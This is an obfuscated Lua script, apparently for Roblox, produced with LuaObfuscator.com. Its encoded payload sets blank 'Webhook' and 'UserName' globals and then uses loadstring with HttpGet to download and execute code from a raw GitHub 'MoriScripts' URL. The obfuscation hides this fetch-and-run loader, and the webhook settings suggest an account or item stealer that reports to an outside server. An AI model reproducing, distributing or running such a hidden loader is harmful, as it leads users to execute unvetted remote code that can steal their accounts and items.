--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v81=0;local v82;while true do if ((0 -0)==v81) then v82=(v31/(((11 -6) -(960 -(892 + 65)))^(v32-(878 -((520 -238) + 595)))))%((3 -(1 + 0))^(((v33-(2 -(1 -0))) -(v32-(620 -(555 + 64)))) + (1066 -(68 + 997)))) ;return v82-(v82%(932 -(857 + 74))) ;end end else local v83=(8 -6)^(v32-(569 -(367 + 201))) ;return (((v31%(v83 + v83))>=v83) and (928 -(214 + 713))) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (353 -(87 + 263)) );v19=v19 + (184 -(67 + 113)) ;return (v37 * 16777216) + (v36 * (48056 + 12856 + 4624)) + (v35 * (628 -372)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if ((0 + 0)==v38) then local v89=202 -(14 + 188) ;local v90;while true do if ((675 -(534 + 141))==v89) then v90=0;while true do if (v90==1) then v38=1 + 0 ;break;end if (v90~=(0 + 0)) then else v39=0;v40=nil;v90=1 + 0 ;end end break;end end end if ((3 -1)==v38) then local v91=0 -0 ;local v92;while true do if (v91==(0 -0)) then v92=0 + 0 ;while true do if (v92==(1 + 0)) then v38=3;break;end if ((396 -(115 + 281))==v92) then local v105=0;while true do if (v105==(0 -0)) then v43=nil;v44=nil;v105=1 + 0 ;end if (v105==(2 -1)) then v92=1;break;end end end end break;end end end if (v38~=3) then else v45=nil;while true do local v94=0;local v95;while true do if (v94~=(0 -0)) then else v95=0;while true do if (v95==(868 -(550 + 317))) then if (v39==(0 -0)) then local v127=0 -0 ;local v128;while true do if ((0 -0)==v127) then v128=285 -(134 + 151) ;while true do if (v128==(1666 -(970 + 695))) then local v163=0 -0 ;while true do if (0==v163) then v42={};v43={v40,v41,nil,v42};v163=1;end if (v163~=(3 -2)) then else v128=2 -0 ;break;end end end if (v128==2) then v39=3 -2 ;break;end if (v128==(1824 -(1195 + 629))) then local v164=0 -0 ;local v165;while true do if (v164==0) then v165=241 -(187 + 54) ;while true do if (v165==(780 -(162 + 618))) then local v170=0;while true do if (v170~=1) then else v165=1;break;end if (v170==(0 + 0)) then v40={};v41={};v170=1 + 0 ;end end end if (v165~=1) then else v128=1;break;end end break;end end end end break;end end end break;end if (v95==(0 -0)) then local v106=0 -0 ;while true do if (v106==(0 + 0)) then local v149=1636 -(1373 + 263) ;while true do if (v149==(1001 -(451 + 549))) then v106=1;break;end if (v149==0) then if (v39==2) then local v166=0 + 0 ;while true do local v169=0;while true do if (v169~=(0 -0)) then else if (v166==(1 -0)) then return v43;end if (v166~=(1384 -(746 + 638))) then else local v171=0;local v172;while true do if (v171~=0) then else v172=0;while true do if (v172==(1 + 0)) then v166=1 -0 ;break;end if (v172~=(341 -(218 + 123))) then else local v175=1581 -(1535 + 46) ;while true do if ((0 + 0)~=v175) then else for v182=1 + 0 ,v24() do local v183=0;local v184;local v185;local v186;while true do if (v183~=(561 -(306 + 254))) then else v186=nil;while true do if (0==v184) then local v193=0 + 0 ;while true do if (v193==(0 -0)) then v185=0;v186=nil;v193=1468 -(899 + 568) ;end if (v193~=(1 + 0)) then else v184=2 -1 ;break;end end end if (v184~=(604 -(268 + 335))) then else while true do if (v185==0) then v186=v22();if (v21(v186,291 -(60 + 230) ,573 -(426 + 146) )==(0 + 0)) then local v194=0;local v195;local v196;local v197;while true do if (1~=v194) then else v197={v23(),v23(),nil,nil};if (v195==(0 + 0)) then local v200=0;local v201;while true do if (v200==(1024 -(706 + 318))) then v201=1251 -(721 + 530) ;while true do if (v201==0) then v197[3]=v23();v197[1275 -(945 + 326) ]=v23();break;end end break;end end elseif (v195==1) then v197[7 -4 ]=v24();elseif (v195==(2 + 0)) then v197[703 -(271 + 429) ]=v24() -((2 + 0)^16) ;elseif (v195~=3) then else local v212=0;local v213;local v214;local v215;while true do if (v212==0) then v213=1500 -(1408 + 92) ;v214=nil;v212=1;end if (1~=v212) then else v215=nil;while true do if (0~=v213) then else v214=1086 -(461 + 625) ;v215=nil;v213=1289 -(993 + 295) ;end if (v213==1) then while true do if (v214==0) then v215=0;while true do if (v215~=0) then else v197[3]=v24() -(2^(1 + 15)) ;v197[1175 -(418 + 753) ]=v23();break;end end break;end end break;end end break;end end end v194=2;end if (v194==3) then if (v21(v196,3,2 + 1 )~=1) then else v197[1 + 3 ]=v45[v197[2 + 2 ]];end v40[v182]=v197;break;end if (v194==(0 + 0)) then local v199=0;while true do if (v199~=(529 -(406 + 123))) then else v195=v21(v186,2,3);v196=v21(v186,1773 -(1749 + 20) ,6);v199=1;end if (v199~=1) then else v194=1 + 0 ;break;end end end if (v194==2) then if (v21(v196,1323 -(1249 + 73) ,1 + 0 )==(1146 -(466 + 679))) then v197[2]=v45[v197[2]];end if (v21(v196,4 -2 ,5 -3 )==(1901 -(106 + 1794))) then v197[3]=v45[v197[1 + 2 ]];end v194=1 + 2 ;end end end break;end end break;end end break;end if (v183~=0) then else v184=0;v185=nil;v183=2 -1 ;end end end for v187=2 -1 ,v24() do v41[v187-(115 -(4 + 110)) ]=v29();end v175=1;end if (v175~=(585 -(57 + 527))) then else v172=1428 -(41 + 1386) ;break;end end end end break;end end end break;end end end end if (v39~=1) then else local v167=0;local v168;while true do if (v167~=(103 -(17 + 86))) then else v168=0 + 0 ;while true do if (v168==(0 -0)) then v44=v24();v45={};v168=2 -1 ;end if (v168~=(167 -(122 + 44))) then else local v173=0 -0 ;while true do if (v173~=1) then else v168=6 -4 ;break;end if (v173==(0 + 0)) then local v174=0 + 0 ;while true do if (v174==(0 -0)) then for v177=1,v44 do local v178=65 -(30 + 35) ;local v179;local v180;local v181;while true do if (v178~=(0 + 0)) then else local v189=0;while true do if (v189~=(1258 -(1043 + 214))) then else v178=3 -2 ;break;end if (v189==0) then v179=0;v180=nil;v189=1;end end end if (v178~=(1213 -(323 + 889))) then else v181=nil;while true do if (v179==0) then local v190=0 -0 ;local v191;while true do if (v190~=0) then else v191=0;while true do if (v191==(581 -(361 + 219))) then v179=321 -(53 + 267) ;break;end if (v191~=0) then else v180=v22();v181=nil;v191=1;end end break;end end end if (v179==(1 + 0)) then if (v180==(414 -(15 + 398))) then v181=v22()~=0 ;elseif (v180==(984 -(18 + 964))) then v181=v25();elseif (v180==3) then v181=v26();end v45[v177]=v181;break;end end break;end end end v43[11 -8 ]=v22();v174=1;end if (v174==1) then v173=1 + 0 ;break;end end end end end if (v168~=2) then else v39=2;break;end end break;end end end v149=1 + 0 ;end end end if (v106~=(851 -(20 + 830))) then else v95=1 + 0 ;break;end end end end break;end end end break;end if (v38==(127 -(116 + 10))) then local v93=0;while true do if (v93==0) then local v102=0;while true do if (v102==1) then v93=1 + 0 ;break;end if (0==v102) then v41=nil;v42=nil;v102=1;end end end if (v93==1) then v38=740 -(542 + 196) ;break;end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=v24();local v47=v24();local v48=1 -0 ;local v49=(v21(v47,1 + 0 ,11 + 9 ) * ((1 + 0 + 1)^32)) + v46 ;local v50=v21(v47,55 -34 ,79 -48 );local v51=((v21(v47,1583 -(1126 + 425) )==1) and  -(406 -(118 + 287))) or (3 -2) ;if (v50==0) then if (v49==0) then return v51 * (1121 -(69 + 49 + 1003)) ;else v50=2 -1 ;v48=(161 + 216) -(82 + 60 + 235) ;end elseif (v50==(9286 -7239)) then return ((v49==(0 + 0)) and (v51 * (1/(977 -(553 + 424))))) or (v51 * NaN) ;end return v8(v51,v50-(1933 -910) ) * (v48 + (v49/((2 + 0)^(112 -60)))) ;end v26=nil;function v26(v52)local v53=0 -0 ;local v54;local v55;while true do if ((2 -1)==v53) then v54=v3(v16,v19,(v19 + v52) -(1 + 0) );v19=v19 + v52 ;v53=9 -7 ;end if (v53==(755 -(239 + 514))) then v55={};for v96=1 + 0 , #v54 do v55[v96]=v2(v1(v3(v54,v96,v96)));end v53=3;end if (v53==((2534 -(373 + 829)) -(797 + (1250 -718)))) then return v6(v55);end if ((0 + 0)==v53) then v54=nil;if  not v52 then v52=v24();if (v52==(0 + (731 -(476 + 255)))) then return "";end end v53=1;end end end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=0;local v58;local v59;while true do if (v57==(1130 -((545 -176) + 761))) then v58,v59=v1(v16,v19,v19 + 2 + 0 );v19=v19 + (2 -0) ;v57=1 -0 ;end if (v57==(239 -(64 + 174))) then return (v59 * (37 + 219)) + v58 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v60,16));if v20 then local v103=0;local v104;while true do if (v103==0) then v104=v5(v85,v20);v20=nil;v103=1;end if (v103==1) then return v104;end end else return v85;end break;end end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v28;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80>0) then local v107=0;local v108;local v109;while true do if (v107==1) then v77[v108 + 1 ]=v109;v77[v108]=v109[v79[4]];break;end if (v107==0) then v108=v79[2];v109=v77[v79[3]];v107=1;end end else v77[v79[2]]=v63[v79[3]];end elseif (v80<=2) then v77[v79[2]]=v63[v79[3]];elseif (v80==3) then local v129=0;local v130;local v131;local v132;local v133;while true do if (v129==0) then v130=v79[2];v131,v132=v70(v77[v130](v13(v77,v130 + 1 ,v79[3])));v129=1;end if (v129==1) then v72=(v132 + v130) -1 ;v133=0;v129=2;end if (v129==2) then for v160=v130,v72 do v133=v133 + 1 ;v77[v160]=v131[v133];end break;end end else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=7) then if (v80<=5) then local v114=v79[2];v77[v114]=v77[v114](v13(v77,v114 + 1 ,v72));elseif (v80==6) then local v136=v79[2];local v137=v77[v79[3]];v77[v136 + 1 ]=v137;v77[v136]=v137[v79[4]];else v77[v79[2]]=v79[3]~=0 ;end elseif (v80<=8) then v77[v79[2]]=v79[3]~=0 ;elseif (v80==9) then v77[v79[2]]=v79[3];elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=15) then if (v80<=12) then if (v80>11) then v77[v79[2]]();else local v117=v79[2];local v118,v119=v70(v77[v117](v13(v77,v117 + 1 ,v79[3])));v72=(v119 + v117) -1 ;local v120=0;for v124=v117,v72 do v120=v120 + 1 ;v77[v124]=v118[v120];end end elseif (v80<=13) then do return;end elseif (v80==14) then v77[v79[2]]=v79[3];elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=18) then if (v80<=16) then local v121=0;local v122;while true do if (v121==0) then v122=v79[2];v77[v122]=v77[v122](v13(v77,v122 + 1 ,v72));break;end end elseif (v80==17) then v71=v79[3];else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=19) then v71=v79[3];elseif (v80>20) then do return;end else v77[v79[2]]();end v71=v71 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03013O0020030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503093O00557365724E616D653200173O00120E3O00013O00260A3O000E000100020004113O000E0001001202000100033O003012000100040005001202000100063O001202000200073O00200600020002000800120E000400094O0007000500014O000B000200054O001000013O00022O000C0001000100010004113O0016000100260A3O0001000100010004113O00010001001202000100033O0030120001000A0005001202000100033O0030120001000B000500120E3O00023O0004113O000100012O00153O00017O00",v9(),...);end
